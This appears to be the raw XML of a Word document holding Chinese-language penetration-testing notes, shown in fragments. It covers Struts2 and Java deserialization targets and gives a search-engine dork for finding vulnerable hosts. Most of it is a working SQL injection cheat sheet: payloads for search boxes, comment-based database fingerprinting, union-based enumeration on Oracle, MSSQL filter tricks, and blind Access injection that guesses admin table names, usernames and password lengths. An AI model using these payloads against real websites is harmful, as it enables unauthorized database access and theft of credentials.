    <w:p w14:paraId="1F414572" w14:textId="77777777" w:rsidR="00A42238" w:rsidRPr="003439C6" w:rsidRDefault="00A42238" w:rsidP="003439C6"/>
    <w:p w14:paraId="2611E309" w14:textId="77777777" w:rsidR="00CA2DA4" w:rsidRPr="003630CF" w:rsidRDefault="00CA2DA4" w:rsidP="00D7298B"/>
    <w:p w14:paraId="173F98BA" w14:textId="77777777" w:rsidR="00CA2DA4" w:rsidRDefault="00CA2DA4" w:rsidP="00D7298B"/>
    <w:p w14:paraId="7DD2E3D8" w14:textId="77777777" w:rsidR="00CA2DA4" w:rsidRDefault="00CA2DA4" w:rsidP="00D7298B"/>
    <w:p w14:paraId="1E7BD23A" w14:textId="77777777" w:rsid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A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>pache下的strust2框架</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">： </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3CBF2F" w14:textId="77777777" w:rsidR="00CA2DA4" w:rsidRDefault="00CA2DA4" w:rsidP="00D7298B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>一般存在漏洞的特征：文件类型</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.action</w:t>
      </w:r>
      <w:proofErr w:type="gram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do</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:proofErr w:type="spell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html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287F25D3" w14:textId="77777777" w:rsidR="00CA2DA4" w:rsidRP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J</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>ava反序列化漏洞的java应用程序：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DAC886" w14:textId="77777777" w:rsidR="00CA2DA4" w:rsidRP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CA2DA4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>boss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="544B9159" w14:textId="77777777"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logic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7213E6E9" w14:textId="77777777"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Share</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="008E61D9" w14:textId="77777777" w:rsidR="00CA2DA4" w:rsidRDefault="00CA2DA4" w:rsidP="00CA2DA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boss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>漏洞寻找语句：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>inurl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：/web/guest/home/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714C7634" w14:textId="77777777" w:rsidR="003C3D8B" w:rsidRDefault="003C3D8B" w:rsidP="00CA2DA4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D5FA7D3" w14:textId="2C331E84" w:rsidR="003C3D8B" w:rsidRDefault="003C3D8B" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D8B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3D8B">
        <w:t>QL</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3D8B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40268386" w14:textId="7C0564F9" w:rsidR="008F0A7A" w:rsidRDefault="008F0A7A" w:rsidP="008F0A7A">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索框注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B68389F" w14:textId="77777777" w:rsidR="002A5D7C" w:rsidRPr="009B36FD" w:rsidRDefault="002A5D7C" w:rsidP="002A5D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sp+acce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搜索框注入</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5D7C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://ishare.iask.sina.com.cn/f/itZ5pncG55.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FFA4F5" w14:textId="1F02B31D" w:rsidR="002A5D7C" w:rsidRDefault="002A5D7C" w:rsidP="00034129"/>
    <w:p w14:paraId="459E1EB3" w14:textId="77777777" w:rsidR="002A5D7C" w:rsidRPr="002A5D7C" w:rsidRDefault="002A5D7C" w:rsidP="00034129"/>
    <w:p w14:paraId="4297C6D8" w14:textId="71DBE503" w:rsidR="008F0A7A" w:rsidRDefault="008F0A7A" w:rsidP="008F0A7A">
      <w:r>
        <w:t xml:space="preserve">SELECT*from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqltest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> where names like ‘%要查询的关键字%’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BED868C" w14:textId="60449CD6" w:rsidR="008F0A7A" w:rsidRDefault="00483503" w:rsidP="00483503">
      <w:pPr>
        <w:ind w:firstLineChars="1900" w:firstLine="3990"/>
      </w:pPr>
      <w:r>
        <w:t>张%‘and’1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=‘1’and</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB64AD6" w14:textId="3B056424" w:rsidR="008F0A7A" w:rsidRDefault="008F0A7A" w:rsidP="008F0A7A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">SELECT* from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqltest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> where names like</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>%张%‘and’1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=‘1’and</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>%’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DF91F1" w14:textId="77777777" w:rsidR="008F0A7A" w:rsidRDefault="008F0A7A" w:rsidP="008F0A7A"/>
    <w:p w14:paraId="553206C1" w14:textId="77777777" w:rsidR="008F0A7A" w:rsidRPr="008F0A7A" w:rsidRDefault="008F0A7A" w:rsidP="008F0A7A"/>
    <w:p w14:paraId="79B5FD20" w14:textId="77777777" w:rsidR="000A449A" w:rsidRPr="000A449A" w:rsidRDefault="000A449A" w:rsidP="000A449A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A449A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>//，-- , /**/, #, --+, -- -, ;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000A449A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000A449A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>00,--a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BCACA9" w14:textId="77777777" w:rsidR="0034210A" w:rsidRDefault="006F7A6B" w:rsidP="00CA2DA4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>“/*”是MySQL中的注释符，返回错误说明该注入点不是MySQL；</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>“--”是Oracle和MSSQL支持的注释符，如果返回正常，则说明为这两种数据库类型之一</w:t>
      </w:r>
      <w:r w:rsidR="0034210A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7BD7F92A" wp14:editId="277EAF87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5274310" cy="2242185"/>
            <wp:effectExtent l="0" t="0" r="254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8A8EF" w14:textId="77777777" w:rsidR="003C3D8B" w:rsidRPr="001011AF" w:rsidRDefault="001011AF" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="001011AF">
        <w:t>Oracle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B5B4FD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order by 3--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FED116B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proofErr w:type="gram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gramEnd"/>
      <w:r w:rsidRPr="003C3D8B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C228F7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'null',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  //返回正常，则第一个字段是数字型，返回错误，为字符型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AA3F35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1,'2','3' from dual--  //判断显示位</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6947A5EC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banner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sys.v_$version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探测数据库版本信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB54E7C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查询第一个表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5290DFA2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STUDENT'),null from dual--  //第二个表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE03BF8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 //查看第一个字段名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27696513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一个表名]'),null from dual-- //查看第二个字段名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1157446D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&lt;&gt;'[第一个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二个表名]'),null from dual--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE8B7C1" w14:textId="77777777" w:rsidR="009B36FD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id,name,pas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student where id=1--  //查看</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DE3CC3" w14:textId="77777777" w:rsid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数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCDA98E" w14:textId="77777777" w:rsidR="009B36FD" w:rsidRDefault="009B36FD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EE8693" w14:textId="77777777" w:rsidR="009B36FD" w:rsidRDefault="009B36FD" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ccess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAD9502" w14:textId="00F956C3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注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78822E5C" w14:textId="6149AD7A" w:rsidR="00336BC5" w:rsidRDefault="00336BC5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C5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Access数据库中没有注释符号.因此  /**/   、 --   和   #   都没法使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B548ED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在MSSQL中，参数和union之间的位置，常见的可填充的方式有如下几种：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F7C8E3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1.空白字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE26198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01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C6AF6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42E7B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2.注释符号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBF47C5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311B92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C2F72">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mssql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C2F72">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>也可以使用注释符号/**/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62910C9E" w14:textId="77777777" w:rsidR="001C2F72" w:rsidRPr="001C2F72" w:rsidRDefault="001C2F72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8892EB" w14:textId="77777777" w:rsidR="00336BC5" w:rsidRDefault="00336BC5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3A653D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注入点：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‘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，and 1=1, and1=2, or 1=1, or 1=2, and 1=23, 在id=后面加一个减号，报错有注入点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4AA422" w14:textId="77777777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数据库类型：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)&gt;0  存在说明是access数据库 ,  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7987976C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 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)&gt;0 存在说明是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server数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C8F9CD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的表：and exists(select * from admin) 返回成功说明存在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76241924" w14:textId="6C7C5011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lastRenderedPageBreak/>
        <w:t>access的数据库中的表：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admin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proofErr w:type="spellStart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name</w:t>
      </w:r>
      <w:r w:rsidRPr="009B36FD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B92472" w:rsidRPr="00B92472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</w:p>
    <w:p w14:paraId="7F49A00C" w14:textId="5C622809" w:rsidR="00B92472" w:rsidRDefault="00B92472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列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pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3CA6C8E5" w14:textId="6575DB0C" w:rsidR="00D97F5F" w:rsidRDefault="00D97F5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299673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>常见的表有</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387DA4C7" w14:textId="54F68EB6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admin admins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use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us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msg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log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user username manager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msg_use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msg_log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eradm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30607">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> product、news、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00230607">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0023060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94403" w:rsidRPr="00394403">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidR="003944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6706B" w:rsidRPr="00F6706B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>article</w:t>
      </w:r>
      <w:r w:rsidR="00F6706B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94403" w:rsidRPr="00394403">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>customer</w:t>
      </w:r>
      <w:r w:rsidR="003944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1F3D17">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>area</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FD21B2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>常见的列</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64026F0C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admin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use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username password passwd pass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pwd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users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er_log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er_name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login_name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等等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75613DBD" w14:textId="77777777" w:rsidR="00D97F5F" w:rsidRPr="00D97F5F" w:rsidRDefault="00D97F5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E57AF4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表内的字段名：and exists(select username from admin) 返回成功说明存在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAACCAA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字段长度：order by N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227A706C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报错：and 1=2 union select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1,2,...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.,N from admin(联合查询)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E37B0D5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账户密码长度：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(admin) from admin)=5 如果返回正常说明管理账户的长度为5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4987ADCD" w14:textId="0DB335D4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(password) from admin)=5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猜解管理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密码长度是5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F24B66C" w14:textId="2E770DC0" w:rsid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57414A" w14:textId="26289EED" w:rsid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82A00F7" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="7C79E5"/>
        </w:rPr>
        <w:t>盲注</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="7C79E5"/>
        </w:rPr>
        <w:t>Access数据库 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E73EBA8" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Access数据库特有的表是：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:color w:val="7C79E5"/>
        </w:rPr>
        <w:t>msysobjects</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:color w:val="7C79E5"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>，所以可以用它来判断是否是Access数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20246366" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>exists(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>*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sysobjects</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>)  #如果这条语句正确，说明是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0611F4" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Access没有数据库的概念，所有的表都是在同一个数据库下。所以，我们不用去判断当前的数据库名，并且access数据库中也不存在 database() 函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EB8593" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>对于判断存在哪些表，只能用以下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>枚举</w:t>
      </w:r>
      <w:r>
        <w:t>的方法来猜测是否存在某某表。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64701A43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存在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>注入后，判断是否存在admin表，如果存在，正常查询，如果不存在，报语法错误。然后通过枚举表名爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAC6F95" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>exists(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6141688A" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>猜测字段也是一样，只能通过枚举来猜测 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255465EE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有admin表后，再判断admin表有多少列，假如1-10正常查询，11列报语法报错，那说明有10列</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D70F3D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 xml:space="preserve">and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>exists(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>*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 xml:space="preserve">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number"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22705E58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出存在的列数后，再判断具体的列名。以下语句判断是否存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>列，如果存在，正常查询，如果不存在，则报语法错误。然后再通过枚举列名爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE01EE0" w14:textId="77777777" w:rsidR="008F5DDF" w:rsidRDefault="008F5DDF" w:rsidP="008F5DDF">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>exists</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
